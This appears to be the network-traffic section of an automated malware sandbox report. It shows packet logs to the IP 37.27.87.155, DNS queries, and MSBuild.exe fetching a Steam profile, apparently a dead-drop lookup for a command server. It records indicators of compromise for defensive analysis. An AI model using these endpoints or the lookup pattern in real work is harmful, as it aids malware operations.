                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.315296888 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.315310001 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.315459013 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.478349924 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.484894037 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.484939098 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.484982967 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.484996080 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.485024929 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.485045910 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.490947962 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.490992069 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.491039991 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.491051912 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.491085052 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.491105080 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.497848034 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.497889996 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.497937918 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.497951031 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.497977972 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.497997999 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.503753901 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.503797054 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.503866911 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.503885031 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.503911018 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.503932953 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.509880066 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.509937048 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.509987116 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.509999037 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.510050058 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.510050058 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.515486956 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.515527964 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.515572071 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.515584946 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.515626907 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.515628099 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.522027969 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.522084951 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.522133112 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.522150040 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.522176027 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.522196054 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.527359009 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.527403116 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.527448893 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.527462006 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.527493954 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.527514935 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.533171892 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.533262014 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.744153976 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.744328976 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.931972980 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.932007074 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.932035923 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.932091951 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.932126999 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.932156086 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.932167053 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.932198048 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.932220936 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.932231903 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.932275057 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.932286978 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.932301998 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.932346106 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.932356119 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.932399035 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.932410955 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.932447910 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.932472944 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.932594061 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.932610989 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.932667017 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.932679892 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.932719946 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.932722092 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.932745934 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.932784081 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.932790995 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.932801008 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.932816982 CEST4434975137.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:30.932853937 CEST49751443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.646692038 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.646704912 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.646851063 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.646910906 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.646987915 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.688999891 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.689013004 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.689232111 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.689294100 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.689362049 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.728334904 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.728372097 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.728527069 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.728527069 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.728589058 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.728647947 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.769798040 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.769833088 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.769948959 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.769948959 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.770009995 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.770080090 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.812985897 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.813014984 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.813114882 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.813114882 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.813177109 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.813323975 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.847659111 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.847681999 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.847731113 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.847789049 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.847822905 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.848095894 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.872590065 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.872606993 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.872744083 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.872803926 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.872863054 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.897617102 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.897631884 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.897777081 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.897835970 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.897910118 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.918521881 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.918545008 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.918729067 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.918788910 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.918843985 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.939130068 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.939143896 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.939282894 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.939342022 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.939400911 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.954469919 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.954545975 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.954632044 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.954694986 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.955811024 CEST49752443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.955872059 CEST4434975237.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.996356010 CEST49753443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.996402025 CEST4434975337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.996468067 CEST49753443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.996674061 CEST49753443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:32.996690989 CEST4434975337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:33.465713024 CEST4434975337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:33.465785027 CEST49753443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:33.466171980 CEST49753443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:33.466190100 CEST4434975337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:33.466360092 CEST49753443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:33.466371059 CEST4434975337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:34.209125042 CEST4434975337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:34.209153891 CEST4434975337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:34.209173918 CEST4434975337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:34.209321976 CEST49753443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:34.209386110 CEST4434975337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:34.209456921 CEST49753443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:34.315536976 CEST4434975337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:34.315563917 CEST4434975337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:34.315637112 CEST49753443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:34.315711021 CEST4434975337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:34.315749884 CEST49753443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:34.315773010 CEST49753443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:34.465521097 CEST4434975337.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:41.279470921 CEST49758443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:41.279505968 CEST4434975837.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:41.279874086 CEST49758443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:41.279930115 CEST4434975837.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:41.280056000 CEST49758443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:41.280090094 CEST4434975837.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:41.280137062 CEST49758443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:41.280155897 CEST4434975837.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:41.280200005 CEST49758443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:41.280232906 CEST4434975837.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:43.051778078 CEST4434975837.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:43.051861048 CEST4434975837.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:43.051861048 CEST49758443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:43.051939964 CEST49758443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:43.052047014 CEST49758443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:43.052087069 CEST4434975837.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:43.055375099 CEST49759443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:43.055403948 CEST4434975937.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:43.055466890 CEST49759443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:43.055660963 CEST49759443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:43.055671930 CEST4434975937.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:43.487282991 CEST4434975937.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:43.487469912 CEST49759443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:43.487899065 CEST49759443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:43.487905025 CEST4434975937.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:43.488064051 CEST49759443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:43.488066912 CEST4434975937.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:44.349209070 CEST4434975937.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:44.349314928 CEST4434975937.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:44.349428892 CEST49759443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:44.349688053 CEST49759443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:44.349709034 CEST4434975937.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:44.351151943 CEST49760443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:44.351236105 CEST4434976037.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:44.351342916 CEST49760443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:44.351639032 CEST49760443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:44.351670980 CEST4434976037.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:44.791863918 CEST4434976037.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:44.791974068 CEST49760443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:44.792586088 CEST49760443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:44.792614937 CEST4434976037.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:44.792850971 CEST49760443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:44.792864084 CEST4434976037.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:45.675712109 CEST4434976037.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:45.675801039 CEST4434976037.27.87.155192.168.2.4
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:45.675829887 CEST49760443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:45.675893068 CEST49760443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:45.676249027 CEST49760443192.168.2.437.27.87.155
                                                                                                                                                                                                                                                                          Apr 20, 2024 14:28:45.676290035 CEST4434976037.27.87.155192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 20, 2024 14:28:07.444802046 CEST | 59121 | 53 | 192.168.2.4 | 1.1.1.1
Apr 20, 2024 14:28:07.550335884 CEST | 53 | 59121 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 20, 2024 14:28:07.444802046 CEST | 192.168.2.4 | 1.1.1.1 | 0xe23e | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 20, 2024 14:28:07.550335884 CEST | 1.1.1.1 | 192.168.2.4 | 0xe23e | No error (0) | steamcommunity.com | - | 23.76.43.59 | A (IP address) | IN (0x0001) | false
Apr 20, 2024 14:28:15.548744917 CEST | 1.1.1.1 | 192.168.2.4 | 0x11f5 | No error (0) | windowsupdatebg.s.llnwi.net | - | 69.164.42.0 | A (IP address) | IN (0x0001) | false
Apr 20, 2024 14:28:15.893414021 CEST | 1.1.1.1 | 192.168.2.4 | 0x615b | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | - | CNAME (Canonical name) | IN (0x0001) | false
Apr 20, 2024 14:28:15.893414021 CEST | 1.1.1.1 | 192.168.2.4 | 0x615b | No error (0) | fp2e7a.wpc.phicdn.net | - | 192.229.211.108 | A (IP address) | IN (0x0001) | false
Apr 20, 2024 14:28:28.648082972 CEST | 1.1.1.1 | 192.168.2.4 | 0xac5e | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | - | CNAME (Canonical name) | IN (0x0001) | false
Apr 20, 2024 14:28:28.648082972 CEST | 1.1.1.1 | 192.168.2.4 | 0xac5e | No error (0) | fp2e7a.wpc.phicdn.net | - | 192.229.211.108 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                                                                          • steamcommunity.com
                                                                                                                                                                                                                                                                          • 37.27.87.155
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 23.76.43.59 | 443 | 4076 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-20 12:28:07 UTC | 119 | OUT | GET /profiles/76561199673019888 HTTP/1.1
                                                                                                                                                                                                                                                                          Host: steamcommunity.com
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
2024-04-20 12:28:08 UTC | 1870 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                                                                                                                                                                                                                                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Date: Sat, 20 Apr 2024 12:28:08 GMT
                                                                                                                                                                                                                                                                          Content-Length: 33790
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Set-Cookie: sessionid=6c8c60d43ffaa978c4302569; Path=/; Secure; SameSite=None
